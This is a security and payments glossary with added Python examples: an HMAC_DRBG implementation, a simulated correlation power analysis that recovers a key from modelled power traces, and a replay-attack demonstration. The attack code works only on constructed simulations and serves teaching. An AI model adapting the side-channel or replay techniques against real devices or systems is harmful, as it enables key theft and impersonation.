Deterministic Random Bit Generator MechanismnounThe portion of an RBG that includes the functions necessary to instantiate and uninstantiate the RBG, generate pseudorandom bits, (optionally) reseed the RBG and test the health of the DRBG mechanism.CapabilityRegulatedMay 12, 2026
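The two DRBG entries above describe a mechanism with instantiate, generate, reseed, uninstantiate and health-test functions, seeded from an entropy source. As an added example, not text or code from the glossary or from NIST, here is HMAC_DRBG from SP 800-90A section 10.1.2 over SHA-256 in Python, with those functions laid out explicitly. The reseed interval and request limit are chosen for the illustration (the standard's ceilings are far larger), and the health test uses a determinism check instead of the standard's known-answer tests, which need published vectors.

```python
import hashlib
import hmac
import os

HASH = hashlib.sha256
OUTLEN = HASH().digest_size        # 32 bytes for SHA-256
RESEED_INTERVAL = 10_000           # example ceiling on generate() calls between reseeds (spec allows up to 2**48)
MAX_REQUEST = 1 << 16              # example ceiling on bytes per generate() call (spec: 2**19 bits)


class HmacDrbg:
    """HMAC_DRBG (SP 800-90A 10.1.2) over SHA-256."""

    def __init__(self, entropy_input: bytes, nonce: bytes = b"", personalization: bytes = b""):
        # Instantiate: seed = entropy || nonce || personalization string.
        if len(entropy_input) < OUTLEN:
            raise ValueError("entropy input must supply at least the security strength")
        self._key = b"\x00" * OUTLEN
        self._v = b"\x01" * OUTLEN
        self._update(entropy_input + nonce + personalization)
        self.reseed_counter = 1

    def _update(self, provided_data: bytes) -> None:
        # HMAC_DRBG_Update: fold provided data into (Key, V); the second half runs only
        # when there is data to absorb.
        self._key = hmac.new(self._key, self._v + b"\x00" + provided_data, HASH).digest()
        self._v = hmac.new(self._key, self._v, HASH).digest()
        if provided_data:
            self._key = hmac.new(self._key, self._v + b"\x01" + provided_data, HASH).digest()
            self._v = hmac.new(self._key, self._v, HASH).digest()

    def reseed(self, entropy_input: bytes, additional_input: bytes = b"") -> None:
        if len(entropy_input) < OUTLEN:
            raise ValueError("entropy input must supply at least the security strength")
        self._update(entropy_input + additional_input)
        self.reseed_counter = 1

    def needs_reseed(self) -> bool:
        return self.reseed_counter > RESEED_INTERVAL

    def generate(self, num_bytes: int, additional_input: bytes = b"") -> bytes:
        if num_bytes > MAX_REQUEST:
            raise ValueError("request exceeds max_number_of_bits_per_request")
        if self.needs_reseed():
            raise RuntimeError("reseed required before further output")
        if additional_input:
            self._update(additional_input)
        out = b""
        while len(out) < num_bytes:
            self._v = hmac.new(self._key, self._v, HASH).digest()
            out += self._v
        self._update(additional_input)      # backtracking resistance: fresh (Key, V) after every call
        self.reseed_counter += 1
        return out[:num_bytes]

    def uninstantiate(self) -> None:
        # Zeroise the internal state and make any further generate() call fail.
        self._key = b"\x00" * OUTLEN
        self._v = b"\x00" * OUTLEN
        self.reseed_counter = RESEED_INTERVAL + 1


def health_test() -> bool:
    """Two instances from the same fixed seed must agree; a reseed must change the stream.
    A validated module runs known-answer tests against published vectors instead."""
    a = HmacDrbg(b"\x00" * 32, b"nonce")
    b = HmacDrbg(b"\x00" * 32, b"nonce")
    if a.generate(64) != b.generate(64):
        return False
    a.reseed(b"\x01" * 32)
    return a.generate(64) != b.generate(64)


def system_drbg() -> HmacDrbg:
    """Instantiate from the operating system's entropy source (os.urandom)."""
    return HmacDrbg(os.urandom(32), os.urandom(16), b"glossary-example")
```

The fixed all-zero seed in `health_test` exists only to make the check reproducible; production instances must be seeded as in `system_drbg`, and the seed, `Key` and `V` are the secret the "deterministic" in the name hinges on.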
deviatenounTurn aside; turn away from.FindingRegulatedMay 9, 2026
deviationnounA variation that departs from the standard or norm.FindingRegulatedMay 12, 2026
Device Distribution ProfilenounAn approval-based Access Control List (ACL) for a specific product that 1) names the user devices in a specific key management infrastructure (KMI) Operating Account (KOA) to which PRSNs distribute the product, and 2) states conditions of distribution for each device.ControlRegulatedCUIMay 9, 2026
device managementnounManaging the implementation, operation, and maintenance of a physical and/or virtual device. This includes the use of various administrative tools and processes for the maintenance and upkeep of a computing, network, mobile and/or virtual device.ProcessRegulatedMay 9, 2026
Differential Power AnalysisnounAn analysis of the variations of the electrical power consumption of a cryptographic module, using advanced statistical methods and/or other techniques, for the purpose of extracting information correlated to cryptographic keys used in a cryptographic algorithm.ThreatRegulatedMay 9, 2026
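A simulated power-analysis attack, added here as an example and not taken from the glossary or any vendor: the attacker knows the plaintexts, guesses the key nibble, predicts the S-box output's Hamming weight under each guess, and correlates the prediction with the measured traces. It uses the Pearson-correlation variant (Brier, Clavier and Olivier's CPA) rather than Kocher's single-bit difference of means, because on a 4-bit S-box the single-bit partition produces ghost peaks that can tie the true key. The S-box is the PRESENT cipher's 4-bit S-box standing in for an AES S-box to keep the table short; the key, trace count, leakage model (Hamming weight plus Gaussian noise) and noise level are constructed for the illustration.

```python
import math
import random

# 4-bit S-box (PRESENT) standing in for an 8-bit AES S-box; the attack shape is identical.
SBOX = [0xC, 0x5, 0x6, 0xB, 0x9, 0x0, 0xA, 0xD, 0x3, 0xE, 0xF, 0x8, 0x4, 0x7, 0x1, 0x2]
SECRET_KEY = 0xB        # key nibble inside the simulated module; never read by the attacker
NUM_TRACES = 4000
NOISE_SD = 1.0          # constructed measurement noise, standard deviation


def hamming_weight(x):
    return bin(x).count("1")


def simulate_traces(key, n, seed=1):
    """Constructed measurement campaign: one power sample per encryption, modelled as
    the Hamming weight of the S-box output plus Gaussian noise (a CMOS bus-leakage model)."""
    rng = random.Random(seed)
    plaintexts, traces = [], []
    for _ in range(n):
        p = rng.randrange(16)
        plaintexts.append(p)
        traces.append(hamming_weight(SBOX[p ^ key]) + rng.gauss(0.0, NOISE_SD))
    return plaintexts, traces


def pearson(xs, ys):
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sxx = sum((x - mx) ** 2 for x in xs)
    syy = sum((y - my) ** 2 for y in ys)
    return sxy / math.sqrt(sxx * syy) if sxx and syy else 0.0


def cpa_scores(plaintexts, traces):
    """For each key guess, correlate the hypothesised leakage HW(S[p ^ guess]) with
    the measured traces. The true key's hypothesis tracks the real leakage, so its
    correlation is the largest; wrong guesses correlate only through S-box structure."""
    scores = []
    for guess in range(16):
        hypothesis = [hamming_weight(SBOX[p ^ guess]) for p in plaintexts]
        scores.append(pearson(hypothesis, traces))
    return scores


def recover_key(plaintexts, traces):
    scores = cpa_scores(plaintexts, traces)
    return max(range(16), key=lambda g: scores[g])


def ghost_peak_margin(plaintexts, traces):
    """Gap between the best and second-best guess; a module's hiding or masking
    countermeasures are judged by how many traces it takes to reopen this gap."""
    ordered = sorted(cpa_scores(plaintexts, traces), reverse=True)
    return ordered[0] - ordered[1]
```

Under this leakage model the true key's expected correlation is 1/sqrt(1 + NOISE_SD²) (about 0.71 here), while the strongest wrong guess reaches roughly half of that, which is why a few thousand traces suffice; raising the noise or adding masking forces the attacker to collect many more.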
Digital EnvelopenounA message encrypted under a symmetric session key, packaged together with that session key encrypted under the recipient's public key.DataRegulatedMay 12, 2026
Digital EvidencenounElectronic information stored or transferred in digital form.ArtifactRegulatedMay 12, 2026
Digital forensicsnounThe application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.ProcessRegulatedMay 12, 2026
Digital signaturenounAn asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation.CredentialRegulatedMay 12, 2026
Digital Signature StandardnounThe US Government standard that specifies the Digital Signature Algorithm (DSA), which involves asymmetric cryptography.FrameworkRegulatedMay 9, 2026
Direct debitnounElectronic transfer, usually through ACH, out of an individual's checking (or savings) account to pay bills, such as mortgage payments, insurance premiums, and utility payments. Also referred to as "direct payment."DataRegulatedPIIMay 9, 2026
Direct depositnounElectronic deposits or credit, usually through ACH, to an individual's deposit account. Common uses of direct deposit include payroll payments, Social Security benefits, and income from investments such as CDs, annuities, and mutual funds.DataRegulatedPIIMay 9, 2026
Direct presentmentnounDepositary banks can present checks directly to the paying institution. The paying institution may be the depositary bank (no settlement is needed), or, if not, may settle on the books of the Federal Reserve, using the Federal Reserve's national settlement service.ProcessRegulatedMay 9, 2026
Direct ShipmentnounShipment of COMSEC material directly from NSA to user COMSEC accounts.ProcessRegulatedCUIMay 9, 2026
Disasternoun1. A sudden, unplanned calamitous event causing great damage or loss. Any event that creates an inability on an enterprise's part to provide critical business functions for some predetermined period of time. Similar terms are business interruption, outage and catastrophe. 2. The period when enterprise management decides to divert from normal production responses and exercises its disaster recovery plan (DRP). It typically signifies the beginning of a move from a primary location to an alternate location.EventRegulatedMay 12, 2026
Disk ImagingnounGenerating a bit-for-bit copy of the original media, including free space and slack space.ProcessRegulatedMay 12, 2026
disposalnounThe purpose of this task is to address the final disposition of regulated data by discarding media with no other sanitization considerations or transferring records to their final state: either destruction or transfer to an archive.ProcessRegulatedCUIMay 9, 2026
Drop AccountabilitynounProcedure under which a COMSEC account custodian initially receipts for COMSEC material, and provides no further accounting for it to its central office of record. Local accountability of the COMSEC material may continue to be required. See Accounting Legend Code.ProcessRegulatedCUIMay 9, 2026
Due carenounThe level of care expected from a reasonable person of similar competency under similar conditionsRequirementRegulatedMay 12, 2026
due diligencenounThe purpose of this task is to take reasonable action in order to comply with a law or industry standard.ProcessRegulatedMay 12, 2026
due diligence processnounThe series of actions an organization takes to implement the steps needed to ensure they respect human rights and do not contribute to conflict.ProcessRegulatedMay 9, 2026
Duplicate Digital EvidencenounA duplicate is an accurate digital reproduction of all data objects contained on the original physical item and associated media.ArtifactRegulatedCUIMay 9, 2026
E-BankingnounThe remote delivery of new and traditional banking products and services through electronic delivery channels.SystemRegulatedPCIMay 9, 2026
E-GovernmentnounThe use by the U.S. government of Web-based Internet applications and other information technology.CapabilityRegulatedCUIMay 9, 2026
Eavesdropping AttacknounAn attack in which an Attacker listens passively to the authentication protocol to capture information which can be used in a subsequent active attack to masquerade as the Claimant.ThreatRegulatedMay 12, 2026
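The attack in this definition, played out in Python as an added example (not part of the glossary): a passive observer records one authentication exchange and later replays it to masquerade as the claimant. The first scheme sends a static authenticator, so the captured value works again; the second makes the verifier issue a fresh nonce per session and binds the response to it, so the recording is useless afterwards. The user name, secret and message layout are constructed for the illustration.

```python
import hashlib
import hmac
import os

# Constructed verifier database: one claimant with a high-entropy secret.
SECRETS = {"alice": b"correct horse battery staple"}


def _tag(secret: bytes, msg: bytes) -> str:
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


class StaticVerifier:
    """Weak scheme: the authenticator is a fixed function of the secret, so any
    copy of it is as good as the secret for logging in."""

    def authenticate(self, user: str, authenticator: str) -> bool:
        secret = SECRETS.get(user)
        return secret is not None and hmac.compare_digest(authenticator, _tag(secret, b"login"))


def static_client(user: str):
    return user, _tag(SECRETS[user], b"login")


class ChallengeVerifier:
    """Challenge-response: the verifier picks a fresh random nonce for every
    session and accepts only a response computed over that nonce."""

    def __init__(self):
        self._pending = {}

    def challenge(self, user: str) -> bytes:
        nonce = os.urandom(16)
        self._pending[user] = nonce
        return nonce

    def authenticate(self, user: str, response: str) -> bool:
        nonce = self._pending.pop(user, None)     # single use: a nonce never verifies twice
        secret = SECRETS.get(user)
        if nonce is None or secret is None:
            return False
        return hmac.compare_digest(response, _tag(secret, b"login" + nonce))


def challenge_client(user: str, nonce: bytes) -> str:
    return _tag(SECRETS[user], b"login" + nonce)


def run_static_scenario():
    """Returns (legitimate login succeeded, replay of the captured exchange succeeded)."""
    verifier, wiretap = StaticVerifier(), []
    user, auth = static_client("alice")
    wiretap.append((user, auth))                 # the eavesdropper only listens
    legit = verifier.authenticate(user, auth)
    replay = verifier.authenticate(*wiretap[0])  # later, the attacker resends it
    return legit, replay


def run_challenge_scenario():
    """Same passive capture against the nonce-bound scheme."""
    verifier, wiretap = ChallengeVerifier(), []
    nonce = verifier.challenge("alice")
    response = challenge_client("alice", nonce)
    wiretap.append(("alice", response))
    legit = verifier.authenticate("alice", response)
    verifier.challenge("alice")                  # the attacker's session gets a new nonce...
    replay = verifier.authenticate(*wiretap[0])  # ...so the recorded response does not verify
    return legit, replay
```

Challenge-response defeats replay but not offline guessing: if the secret is a low-entropy password, the recorded (nonce, response) pair lets the eavesdropper test candidate passwords at leisure, which is why the definition's "subsequent active attack" is only one of the follow-ups to worry about and why the channel itself should be encrypted as well.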
ecosystemnounA system or group of interconnected elements, formed by linkages and dependencies. For an FMI, this may include participants, linked FMIs, service providers, vendors and vendor products.SystemRegulatedMay 12, 2026
Electricity Sector Information Sharing and Analysis CenternounThe Electricity Sector Information Sharing and Analysis Center (ES-ISAC) shares critical information with industry participants about infrastructure protection. The ES-ISAC serves the electricity sector by facilitating communications between electricity sector participants, federal governments, and other critical infrastructures. It is the job of the ES-ISAC to promptly disseminate threat indications, vulnerabilities, analyses, and warnings, together with interpretations, to help electricity sector participants take protective actions.OrganizationRegulatedCUIMay 9, 2026
electronic accessnounThe right or opportunity to use or retrieve something or enter a place through electronic means.ControlRegulatedMay 12, 2026
electronic access controlnounA cyber asset that performs electronic access control of the Electronic Security Perimeter(s) or BES Cyber Systems.ControlRegulatedCUIMay 9, 2026
Electronic Access PointnounA Cyber Asset interface on an Electronic Security Perimeter that allows routable communication between Cyber Assets outside an Electronic Security Perimeter and Cyber Assets inside an Electronic Security Perimeter.NetworkRegulatedCUIMay 12, 2026
Electronic Benefits Transfer (EBT)nounA type of EFT system involving the transfer of public entitlement payments, such as welfare or food stamps, through direct deposit or point-of-sale technology (see POS). The recipient can be given an identification card, similar to a benefit card, and a PIN allowing access to the benefits through an electronic network.SystemRegulatedPIIMay 9, 2026
Electronic bill presentment and payment (EBPP)nounAn electronic alternative to traditional bill payment, allowing a merchant or utility to present its customers with an electronic bill and the payer to pay the bill electronically. EBPP systems usually fall within two models: direct and consolidation-aggregation. In the direct model, the merchant or utility generates an electronic version of the consumer's billing information, and notifies the consumer of a pending bill, generally via e-mail. The consumer can initiate payment of the electronically presented bill using a variety of payment mechanisms, typically a credit card. In the consolidation-aggregation model, the consumer's bills are consolidated by a consolidator acting on behalf of merchants and utilities (or aggregated on behalf of the consumer), combining data from multiple bills and presenting a single source for the consumer to initiate payment. Some consolidators present bills at their own web sites, but most support the aggregation of bills by consumer service providers such as Internet portals, financial institutions, and brokerage web sites.SystemRegulatedPCIMay 9, 2026
Electronic check conversionnounThe process by which a check is used as a source of information for the check number, the customer's account number, and the number that identifies the financial institution. The information is used to make a one-time electronic payment from the customer's account -- an electronic fund transfer. The check itself is not the method of payment.ProcessRegulatedPIIMay 9, 2026
Electronic check presentment (ECP)nounCheck truncation methodology in which the paper check's MICR line information is captured and stored electronically for presentment. The physical checks may or may not be presented after the electronic files are delivered, depending on the type of ECP service that is used.ProcessRegulatedPCIMay 9, 2026
Electronic data capture (EDC)nounProcess used for capturing and transferring the encoded information on the magnetic strip from a bankcard or debit card at the point-of-sale to the processor's database.ProcessRegulatedPCIMay 9, 2026
Electronic EvidencenounInformation and data of investigative value that is stored on or transmitted by an electronic device.ArtifactRegulatedMay 12, 2026
electronic funds transfernounThe use of telecommunications networks to transfer funds from one financial institution, as a bank, to another, or to withdraw funds from one's own account to deposit in a creditor's.ProcessRegulatedPCIMay 9, 2026
Electronic funds transfer (EFT) | noun | A generic term describing any transfer of funds between parties or depository institutions through electronic data systems. | Process, Regulated, PCI | May 9, 2026
Electronic Funds Transfer Act (EFTA) | noun | The Electronic Funds Transfer Act and Regulation E are designed to ensure adequate disclosure of basic terms, costs, and rights relating to electronic fund transfer (EFT) services provided to consumers. Institutions offering EFT services must disclose to consumers certain information, including: initial and updated EFT terms, transaction information, periodic statements of activity, the consumer's potential liability for unauthorized transfers, and error resolution rights and procedures. EFT services include automated teller machines, telephone bill payment, point-of-sale transfers in retail stores, fund transfers initiated through the Internet, and pre-authorized transfers to or from a consumer's account. | Framework, Regulated | May 9, 2026
electronic funds transfer activity | noun | Any transfer of funds which is initiated through an electronic terminal, telephonic instrument, computer, or magnetic tape so as to order, instruct, or authorize a financial institution to debit or credit an account. ... These are normally considered retail funds transfer systems. | Data, Regulated, PCI | May 9, 2026
electronic funds transfer function | noun | Any activity that corresponds with or relates to the transfer of funds electronically. | Capability, Regulated | May 12, 2026
Electronic funds transfer point of sale equipment | noun | Any instruments or machinery required for an electronic transfer of money to take place. | Physical, Regulated, PCI | May 9, 2026
Electronic Key Entry | noun | The entry of cryptographic keys into a cryptographic module using electronic methods such as a smart card or a key-loading device. (The operator of the key may have no knowledge of the value of the key being entered.) | Process, Regulated, CUI | May 12, 2026
Electronic Key Management System | noun | Interoperable collection of systems being developed by services and agencies of the U.S. government to automate the planning, ordering, generating, distributing, storing, filling, using, and destroying of electronic key and management of other types of COMSEC material. | System, Regulated, CUI | May 9, 2026
Electronic Messaging Services | noun | Services providing interpersonal messaging capability; meeting specific functional, management, and technical requirements; and yielding a business-quality electronic mail service suitable for the conduct of official government business. | Capability, Regulated, CUI | May 9, 2026
Electronic Security Perimeter | noun | The logical border surrounding a network to which Critical Cyber Assets are connected and for which access is controlled. | Network, Regulated, CUI | May 12, 2026
electronic signature | noun | The process of applying any mark in electronic form with the intent to sign a data object. See also Digital Signature. | Credential, Regulated | May 9, 2026
Electronic vaulting | noun | A back-up procedure that copies changed files and transmits them to an off-site location using a batch process. | Process, Regulated | May 12, 2026
Electronically Generated Key | noun | Key generated in a COMSEC device by introducing (either mechanically or electronically) a seed key into the device and then using the seed, together with a software algorithm stored in the device, to produce the desired key. | Credential, Regulated, CUI | May 9, 2026
Electronically-created payment orders | noun | These are payment orders received by merchants from consumers, typically by telephone or the Internet. These payment orders are processed through the check processing system although they were not initiated as paper checks. These payment orders are not subject to check law and are not warranted by the Federal Reserve Banks. | Data, Regulated, PCI | May 9, 2026
elevated access | noun | Roles or permissions that, if misused or compromised, could allow a person to exploit the system for his or her own gain or illicit purpose. | Control, Regulated | May 12, 2026
Emanations Security | noun | Protection resulting from measures taken to deny unauthorized individuals information derived from intercept and analysis of compromising emissions from crypto-equipment or an information system. See TEMPEST. | Control, Regulated, CUI | May 9, 2026
Embedded Cryptographic System | noun | Cryptosystem performing or controlling a function as an integral element of a larger system or subsystem. | System, Regulated, CUI | May 12, 2026
employee access | noun | The privileges to gain entry to somewhere or to use something given only to employees. | Control, Regulated | May 9, 2026
Enclave | noun | Collection of information systems connected by one or more internal networks under the control of a single authority and security policy. The systems may be structured by physical proximity or by function, independent of location. | System, Regulated | May 12, 2026
Enclave Boundary | noun | Point at which an enclave’s internal network service layer connects to an external network’s service layer, i.e., to another enclave or to a Wide Area Network (WAN). | Network, Regulated | May 12, 2026
Encrypted Key | noun | A cryptographic key that has been encrypted using an Approved security function with a key encrypting key, a PIN, or a password in order to disguise the value of the underlying plaintext key. | Credential, Regulated, CUI | May 12, 2026
End Cryptographic Unit | noun | Device that (1) performs cryptographic functions, (2) typically is part of a larger system for which the device provides security services, and (3) from the viewpoint of a supporting security infrastructure (e.g., a key management system), is the lowest level of identifiable component with which a management transaction can be conducted. | System, Regulated, CUI | May 9, 2026
End-Item Accounting | noun | Accounting for all the accountable components of a COMSEC equipment configuration by a single short title. | Process, Regulated, CUI | May 9, 2026
End-to-end recoverability | noun | The ability of an institution to recover a business process from initiation, such as customer contact, through process finalization, such as transaction closure. | Capability, Regulated | May 12, 2026
entry point | noun | An entry point is a memory address, corresponding to a point in the code of a computer program, which is intended as the destination of a long jump, be it internal or external. | System, Regulated | May 9, 2026
Error Detection Code | noun | A code computed from data and comprised of redundant bits of information designed to detect, but not correct, unintentional changes in the data. | Control, Regulated | May 9, 2026
escrow | noun | Something (e.g., a document, an encryption key) that is "delivered to a third person to be given to the grantee only upon the fulfillment of a condition." | Artifact, Regulated | May 12, 2026
Evaluation Assurance Level | noun | Set of assurance requirements that represent a point on the Common Criteria predefined assurance scale. | Requirement, Regulated | May 12, 2026
event log | noun | A basic resource that helps provide information about network traffic, usage and other conditions. An event log stores these data for retrieval by security professionals or automated security systems to help network administrators manage various aspects such as security, performance and transparency. | Artifact, Regulated | May 9, 2026
event logging | noun | The purpose of this task is to record the actions performed on a system. | Artifact, Regulated | May 9, 2026
Evidence | noun | Information used to establish facts. | Artifact, Regulated | May 12, 2026
executable | noun | A file or program that can be run by a computer. | Data, Regulated | May 12, 2026
execution status | noun | The status of the implementation or enactment of a plan, order, or course of action. | Metric, Regulated | May 9, 2026
Executive Agency | noun | An executive department specified in 5 United States Code (U.S.C.), Sec. 101; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); and a wholly owned government corporation fully subject to the provisions of 31 U.S.C., Chapter 91. | Organization, Regulated, CUI | May 9, 2026
Exercise Key | noun | Cryptographic key material used exclusively to safeguard communications transmitted over-the-air during military or organized civil training exercises. | Credential, Regulated, CUI | May 9, 2026
exfiltration | noun | The unauthorized transfer of information from an information system. | Event, Regulated | May 12, 2026
exit | noun | A way out. | Physical, Regulated | May 12, 2026
Expedited Funds Availability Act (EFAA) | noun | See Regulation CC. | Framework, Regulated | May 12, 2026
exposure | noun | The potential loss to an area due to the occurrence of an adverse event. | Vulnerability, Regulated | May 12, 2026
Exposure limit | noun | In reference to the settlement of operating services, this is the maximum amount an ACH originator is allowed to originate. This amount can be based on the originator's credit rating, historical or predicted funding requirements, and the type of obligation. | Requirement, Regulated | May 12, 2026
external connection | noun | A link between a system within the organizational boundaries and a secondary (or multiple) system(s) outside of the organizational boundaries. | Network, Regulated | May 9, 2026
external connectivity | noun | A computer or network connection to an outside, uncontrolled network that is unprotected by perimeter security, e.g., a modem connection to a network computer. | Network, Regulated | May 9, 2026
external information system | noun | An information system or component of an information system that is outside of the accreditation boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. | System, Regulated | May 9, 2026
External Information System or Component | noun | An information system or component of an information system that is outside of the authorization boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. | System, Regulated | May 9, 2026
External Information System Service | noun | An information system service that is implemented outside of the authorization boundary of the organizational information system (i.e., a service that is used by, but not a part of, the organizational information system) and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. | System, Regulated | May 12, 2026
External Information System Service Provider | noun | A provider of external information system services to an organization through a variety of consumer-producer relationships, including but not limited to: joint ventures; business partnerships; outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements); licensing agreements; and/or supply chain exchanges. | Organization, Regulated | May 12, 2026
external requirement | noun | Any law, contractual obligation, code of connection, service level agreement, or even international agreement. | Requirement, Regulated | May 9, 2026
external routable connectivity | noun | The ability to access a Bulk Electric System Cyber System from a Cyber Asset that is outside of its associated Electronic Security Perimeter via a bi-directional routable protocol connection. | Network, Regulated | May 9, 2026
external user | noun | Individuals that are non-workforce members or personnel who are authorized by customers, entity management, or other authorized persons to interact with the system. | Identity, Regulated | May 9, 2026
Extraction Resistance | noun | Capability of crypto-equipment or secure telecommunications equipment to resist efforts to extract key. | Control, Regulated | May 9, 2026
Failure Access | noun | Type of incident in which unauthorized access to data results from hardware or software failure. | Event, Regulated | May 12, 2026
False Acceptance | noun | In biometrics, the instance of a security system incorrectly verifying or identifying an unauthorized person. It typically is considered the most serious of biometric security errors as it gives unauthorized users access to systems that expressly are trying to keep them out. | Vulnerability, Regulated | May 9, 2026
False Rejection | noun | In biometrics, the instance of a security system failing to verify or identify an authorized person. It does not necessarily indicate a flaw in the biometric system; for example, in a fingerprint-based system, an incorrectly aligned finger on the scanner or dirt on the scanner can result in the scanner misreading the fingerprint, causing a false rejection of the authorized user. | Event, Regulated | May 12, 2026
Federal Bridge Certification Authority | noun | The Federal Bridge Certification Authority consists of a collection of Public Key Infrastructure components (Certificate Authorities, Directories, Certificate Policies and Certificate Practice Statements) that are used to provide peer-to-peer interoperability among Agency Principal Certification Authorities. | System, Regulated, CUI | May 9, 2026
Federal Bridge Certification Authority Membrane | noun | The Federal Bridge Certification Authority Membrane consists of a collection of Public Key Infrastructure components including a variety of Certification Authority PKI products, Databases, CA specific Directories, Border Directory, Firewalls, Routers, Randomizers, etc. | System, Regulated, CUI | May 9, 2026
Federal Bridge Certification Authority Operational Authority | noun | The Federal Bridge Certification Authority Operational Authority is the organization selected by the Federal Public Key Infrastructure Policy Authority to be responsible for operating the Federal Bridge Certification Authority. | Organization, Regulated, CUI | May 9, 2026
Federal Information Processing Standard | noun | A standard for adoption and use by federal departments and agencies that has been developed within the Information Technology Laboratory and published by the National Institute of Standards and Technology, a part of the U.S. Department of Commerce. A FIPS covers some topic in information technology in order to achieve a common level of quality or some level of interoperability. | Framework, Regulated, CUI | May 12, 2026
Federal Information Security Management Act | noun | A statute (Title III, P.L. 107-347) that requires agencies to assess risk to information systems and provide information security protections commensurate with the risk. FISMA also requires that agencies integrate information security into their capital planning and enterprise architecture processes, conduct annual information systems security reviews of all programs and systems, and report the results of those reviews to OMB. | Framework, Regulated | May 9, 2026
Federal Information System | noun | An information system used or operated by an executive agency, by a contractor of an executive agency, or by another organization on behalf of an executive agency. | System, Regulated, CUI | May 9, 2026
Federal Reserve Banks | noun | The Federal Reserve Banks provide a variety of financial services including retail and wholesale payments. The Federal Reserve Bank operates a nationwide system for clearing and settling checks drawn on depository institutions located in all regions of the United States. | Organization, Regulated | May 12, 2026
federal securities law | noun | Consists of a handful of laws passed between 1933 and 1940, as well as legislation enacted in 1970. The federal laws stem from Congress's power to regulate interstate commerce. Therefore the laws are generally limited to transactions involving transportation or communication using interstate commerce or the mail. | Framework, Regulated | May 9, 2026
Fedwire | noun | The Federal Reserve Bank's nationwide real time gross settlement electronic funds and securities transfer network. Fedwire® is a credit transfer system. Each funds transfer is settled individually against an institution's reserve or clearing account on the books of the Federal Reserve. The transaction is considered an irrevocable payment as it is processed. | Network, Regulated | May 9, 2026
Fedwire Funds Service | noun | The Federal Reserve Banks' high-speed electronic funds transfer system. As a real-time gross settlement system, the Fedwire® Funds Service processes and settles individual payments between participants immediately in central bank money. Once processed, these payments are final. | System, Regulated | May 12, 2026
Fedwire Securities Service | noun | The Federal Reserve Banks' high-speed electronic payments system for maintaining securities accounts and for effecting securities transfers. The Fedwire® Securities Service provides a real-time, delivery-versus-payment (DVP), gross settlement system that allows for the immediate, simultaneous transfer of securities against payment. Once processed, securities transfers are final. | System, Regulated | May 12, 2026
Fill Device | noun | COMSEC item used to transfer or store key in electronic form or to insert key into cryptographic equipment. | Physical, Regulated, CUI | May 9, 2026
FIN (Financial Application) | noun | The SWIFT application within which all SWIFT user-to-user messages are input and output. | System, Regulated, PCI | May 9, 2026
Finality | noun | Irrevocable and unconditional transfer of payment during settlement. | Requirement, Regulated, PCI | May 12, 2026
Financial Authority | noun | A supervisory organization that is responsible for safeguarding and maintaining consumer confidence in the financial system. | Organization, Regulated | May 9, 2026
financial condition | noun | The status of a firm's assets, liabilities and equity positions at a specific point in time, often described in a financial statement. | Data, Regulated | May 12, 2026
Financial EDI (FEDI) | noun | Financial electronic data interchange. An instrument for settling invoices by initiating payments, processing remittance data and automating reconciliation, through the exchange of electronic messages. | Data, Regulated, PII | May 9, 2026
Financial industry participants | noun | Financial institutions and other companies that are involved in the banking, securities, and/or insurance industry and are regulated by supervisory authorities. | Organization, Regulated | May 9, 2026
financial institution | noun | Any bank licensed under the Banking Act (Cap. 19); any finance company licensed under the Finance Companies Act (Cap. 108); any person that is approved as a financial institution under section 28; any money-changer licensed to conduct money-changing business, or any remitter licensed to conduct remittance business, under the Money-changing and Remittance Businesses Act (Cap. 187); any insurer licensed or regulated under the Insurance Act (Cap. 142); any insurance intermediary registered or regulated under the Insurance Act; any licensed financial adviser under the Financial Advisers Act (Cap. 110); any approved holding company, securities exchange, futures exchange, recognised market operator, licensed trade repository, licensed foreign trade repository, approved clearing house, recognised clearing house or holder of a capital markets services licence under the Securities and Futures Act (Cap. 289); any trustee for a collective investment scheme authorised under section 286 of the Securities and Futures Act, that is approved under that Act; any trustee-manager of a business trust that is registered under the Business Trusts Act (Cap. 31A); any licensed trust company under the Trust Companies Act (Cap. 336); any holder of a stored value facility under the Payment Systems (Oversight) Act (Cap. 222A); any designated financial holding company under the Financial Holding Companies Act 2013 (Act 13 of 2013); any person licensed under the Banking Act (Cap. 19) to carry on the business of issuing credit cards or charge cards in Singapore; and any other person licensed, approved, registered or regulated by the Authority under any written law, but does not include such person or class of persons as the Authority may, by regulations made under this section, prescribe. | Organization, Regulated | May 9, 2026
financial market infrastructure | noun | A multilateral system among participating institutions, including the operator of the system, used for the purposes of clearing, settling or recording payments, securities, derivatives or other financial transactions. | System, Regulated | May 12, 2026
Financial Services Information Sharing and Analysis Center (FS-ISAC) | noun | A nonprofit, information-sharing forum established by financial services industry participants to facilitate the public and private sectors' sharing of physical and cybersecurity threat and vulnerability information. | Organization, Regulated | May 9, 2026
financial transaction | noun | An event or agreement carried out between a buyer and a seller to exchange an asset for payment. | Event, Regulated | May 9, 2026
finding | noun | Something discovered as a result of an inquiry or investigation. | Finding, Regulated | May 9, 2026
FIPS PUB | noun | An acronym for Federal Information Processing Standards Publication. FIPS publications (PUB) are issued by NIST after approval by the Secretary of Commerce. | Framework, Regulated, CUI | May 12, 2026
FIPS-Approved Security Method | noun | A security method (e.g., cryptographic algorithm, cryptographic key generation algorithm or key distribution technique, random number generator, authentication technique, or evaluation criteria) that is either a) specified in a FIPS, or b) adopted in a FIPS. | Control, Regulated, CUI | May 9, 2026
FIPS-Validated Cryptography | noun | A cryptographic module validated by the Cryptographic Module Validation Program (CMVP) to meet requirements specified in FIPS 140-2 (as amended). As a prerequisite to CMVP validation, the cryptographic module is required to employ a cryptographic algorithm implementation that has successfully passed validation testing by the Cryptographic Algorithm Validation Program (CAVP). See NSA-Approved Cryptography. | Control, Regulated | May 9, 2026
